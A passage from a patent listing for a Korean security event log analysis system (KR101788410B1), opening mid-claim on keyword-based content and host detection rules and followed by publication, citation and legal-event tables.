content-based detection, in which the keywords referenced in the event detection rule DB 112 are pattern-matched against CONTENTS_001 through CONTENTS_004 using a combination of AND, OR and NOT operators;
and host-based detection, in which the keywords referenced in the event detection rule DB 112 are pattern-matched against HOST, SRC and DST using a combination of AND, OR and NOT operators; a security breach analysis method using security event log analysis.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
KR1020150161973A KR101788410B1 (en) | 2015-11-18 | 2015-11-18 | An analysis system of security breach with analyzing a security event log and an analysis method thereof |
Publications (2)
Publication Number | Publication Date |
---|---|
KR20170058140A true KR20170058140A (en) | 2017-05-26 |
KR101788410B1 KR101788410B1 (en) | 2017-10-19 |
Family
ID=59052141
Country Status (1)
Country | Link |
---|---|
KR (1) | KR101788410B1 (en) |
Application events
- 2015-11-18: KR1020150161973A (KR), granted as KR101788410B1, status active (IP right grant)
Cited By (10)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
KR102038926B1 (en) * | 2018-11-17 | 2019-11-15 | 한국과학기술정보연구원 | Aggressor selecting device and control method thereof |
KR102215228B1 (en) | 2020-04-13 | 2021-02-10 | 서울과학기술대학교 산학협력단 | Detection and Elimination System and Method of Redundant Access Patterns in Programs by Analyzing Log Data |
KR102158784B1 (en) * | 2020-05-14 | 2020-09-22 | 주식회사 쿼리시스템즈 | System for automatically blocking security threats that interoperate with heterogeneous security devices |
CN113592690A (en) * | 2021-07-30 | 2021-11-02 | 卡斯柯信号有限公司 | Database model-based hazard management method |
CN113592690B (en) * | 2021-07-30 | 2024-03-29 | 卡斯柯信号有限公司 | Hazard management method based on database model |
KR102426889B1 (en) * | 2022-01-05 | 2022-07-29 | 주식회사 이글루코퍼레이션 | Apparatus, method and program for analyzing and processing data by log type for large-capacity event log |
KR20230106083A (en) * | 2022-01-05 | 2023-07-12 | 주식회사 이글루코퍼레이션 | Device, method and program that analyzes large log data using a distributed method for each log type |
CN114826727A (en) * | 2022-04-22 | 2022-07-29 | 南方电网数字电网研究院有限公司 | Flow data acquisition method and device, computer equipment and storage medium |
CN114826727B (en) * | 2022-04-22 | 2024-05-07 | 南方电网数字电网研究院有限公司 | Flow data acquisition method, device, computer equipment and storage medium |
CN116232751A (en) * | 2023-03-16 | 2023-06-06 | 中国华能集团有限公司北京招标分公司 | Safety alarm analysis method |
Also Published As
Publication number | Publication date |
---|---|
KR101788410B1 (en) | 2017-10-19 |
Legal Events
Code | Title |
---|---|
A201 | Request for examination |
E902 | Notification of reason for refusal |
E701 | Decision to grant or registration of patent right |